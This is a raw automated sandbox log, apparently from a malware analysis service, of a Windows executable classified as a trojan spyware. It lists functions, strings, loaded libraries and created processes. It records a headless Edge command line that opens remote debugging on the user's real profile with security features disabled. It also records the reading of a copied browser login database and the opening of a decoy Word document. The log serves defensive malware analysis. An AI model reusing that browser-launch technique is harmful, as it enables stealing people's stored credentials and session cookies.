      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1EB7D00_2_00007FFEEE1EB7D0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE2388300_2_00007FFEEE238830
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE14D8300_2_00007FFEEE14D830
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE14E8100_2_00007FFEEE14E810
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1BD8100_2_00007FFEEE1BD810
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1D58100_2_00007FFEEE1D5810
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1B94700_2_00007FFEEE1B9470
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE14F4400_2_00007FFEEE14F440
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1354500_2_00007FFEEE135450
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE20D4400_2_00007FFEEE20D440
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1DE4A00_2_00007FFEEE1DE4A0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1C24B00_2_00007FFEEE1C24B0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE2394900_2_00007FFEEE239490
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE12A5300_2_00007FFEEE12A530
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE2305100_2_00007FFEEE230510
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1015300_2_00007FFEEE101530
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1445700_2_00007FFEEE144570
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1685700_2_00007FFEEE168570
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE2315400_2_00007FFEEE231540
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE12F5A00_2_00007FFEEE12F5A0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1725A00_2_00007FFEEE1725A0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1E65F00_2_00007FFEEE1E65F0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1256240_2_00007FFEEE125624
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1C36300_2_00007FFEEE1C3630
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE10A6100_2_00007FFEEE10A610
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1A36120_2_00007FFEEE1A3612
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1232600_2_00007FFEEE123260
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1E02E00_2_00007FFEEE1E02E0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1253230_2_00007FFEEE125323
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1E13200_2_00007FFEEE1E1320
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1863400_2_00007FFEEE186340
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1FC3A00_2_00007FFEEE1FC3A0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1EE3B00_2_00007FFEEE1EE3B0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE25F3A80_2_00007FFEEE25F3A8
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE17C3800_2_00007FFEEE17C380
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE15D3800_2_00007FFEEE15D380
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1703900_2_00007FFEEE170390
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE12C3E00_2_00007FFEEE12C3E0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE14E3E00_2_00007FFEEE14E3E0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1C83E00_2_00007FFEEE1C83E0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1103D00_2_00007FFEEE1103D0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1743D00_2_00007FFEEE1743D0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE2464300_2_00007FFEEE246430
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE21B4300_2_00007FFEEE21B430
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1D20500_2_00007FFEEE1D2050
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1070B00_2_00007FFEEE1070B0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1E60E00_2_00007FFEEE1E60E0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE20D0D00_2_00007FFEEE20D0D0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1700D00_2_00007FFEEE1700D0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1491200_2_00007FFEEE149120
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1441300_2_00007FFEEE144130
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE15C1000_2_00007FFEEE15C100
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1D017B0_2_00007FFEEE1D017B
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1941400_2_00007FFEEE194140
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1181A00_2_00007FFEEE1181A0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1DD1900_2_00007FFEEE1DD190
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE16E1E00_2_00007FFEEE16E1E0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1411F00_2_00007FFEEE1411F0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1601C00_2_00007FFEEE1601C0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE18C2200_2_00007FFEEE18C220
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE2412100_2_00007FFEEE241210
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1302100_2_00007FFEEE130210
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: 0_2_00007FFEEE1B62100_2_00007FFEEE1B6210
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: String function: 00007FFEEE1F1F90 appears 31 times
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: String function: 00007FFEEE1C8EA0 appears 206 times
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: String function: 00007FFEEE114970 appears 110 times
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeCode function: String function: 00007FFEEE128730 appears 306 times
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameEntityFramework.dllV vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1903981529.00007FF7D3DBD000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameoke.dll@ vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: get_Language$get_LegalCopyright&get_LegalTrademarks(get_OriginalFilename get_PrivateBuild(get_ProductBuildPart(get_ProductMajorPart(get_ProductMinorPart vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: _legalCopyright"_originalFilename vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.Management.dll@ vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.Security.Cryptography.ProtectedData.dll@ vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.IO.Compression.dll@ vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.Data.SQLite.dllF vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSQLitePCLRaw.provider.e_sqlite3.dllV vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSQLitePCLRaw.core.dllV vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSQLitePCLRaw.batteries_v2.dllV vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000003.1584163889.0000025112142000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWinWord.exeB vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: get_Language$get_LegalCopyright&get_LegalTrademarks(get_OriginalFilename get_PrivateBuild(get_ProductBuildPart(get_ProductMajorPart(get_ProductMinorPart vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: _legalCopyright"_originalFilename vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.Management.dll@ vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.Security.Cryptography.ProtectedData.dll@ vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.IO.Compression.dll@ vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.Data.SQLite.dllF vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSQLitePCLRaw.provider.e_sqlite3.dllV vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSQLitePCLRaw.core.dllV vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSQLitePCLRaw.batteries_v2.dllV vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exeBinary or memory string: get_Language$get_LegalCopyright&get_LegalTrademarks(get_OriginalFilename get_PrivateBuild(get_ProductBuildPart(get_ProductMajorPart(get_ProductMinorPart vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exeBinary or memory string: _legalCopyright"_originalFilename vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exeBinary or memory string: OriginalFilename vs hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exeBinary or memory string: OriginalFilenameSystem.Management.dll@ vs hJ1bl8p7dJ.exe
      Source: classification engineClassification label: mal72.troj.spyw.winEXE@17/12@3/4
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeFile created: C:\Users\Public\Documents\638724355399194976Jump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeFile created: C:\Users\user\AppData\Local\Temp\tmp2jco13.tmpJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1901160535.000002107E400000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
      Source: hJ1bl8p7dJ.exe, hJ1bl8p7dJ.exe, 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1901160535.000002107E400000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
      Source: hJ1bl8p7dJ.exe, hJ1bl8p7dJ.exe, 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1901160535.000002107E400000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
      Source: hJ1bl8p7dJ.exe, hJ1bl8p7dJ.exe, 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1901160535.000002107E400000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
      Source: hJ1bl8p7dJ.exe, hJ1bl8p7dJ.exe, 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1901160535.000002107E400000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
      Source: hJ1bl8p7dJ.exe, hJ1bl8p7dJ.exe, 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1901160535.000002107E400000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
      Source: hJ1bl8p7dJ.exe, 00000000.00000003.1899159896.0000025112163000.00000004.00000020.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000003.1899353321.0000025112229000.00000004.00000020.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000003.1898713858.0000025112229000.00000004.00000020.00020000.00000000.sdmp, Default_LoginDataTemp.db.0.dr, tmp2jco13.tmp.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
      Source: hJ1bl8p7dJ.exe, hJ1bl8p7dJ.exe, 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1901160535.000002107E400000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
      Source: unknownProcess created: C:\Users\user\Desktop\hJ1bl8p7dJ.exe "C:\Users\user\Desktop\hJ1bl8p7dJ.exe"
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9723 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1600 --field-trial-handle=1472,i,8808784561077415658,3538669664059517056,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Documents\Your_Benefits_and_Role.docx" /o ""
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9230 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1604 --field-trial-handle=1412,i,17015067578929256214,2434644396816959813,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9723 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Documents\Your_Benefits_and_Role.docx" /o ""Jump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9230 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1600 --field-trial-handle=1472,i,8808784561077415658,3538669664059517056,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3Jump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1604 --field-trial-handle=1412,i,17015067578929256214,2434644396816959813,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3Jump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: icu.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: wshunix.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: devobj.dllJump to behavior
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exeSection loaded: rasadhlp.dllJump to behavior
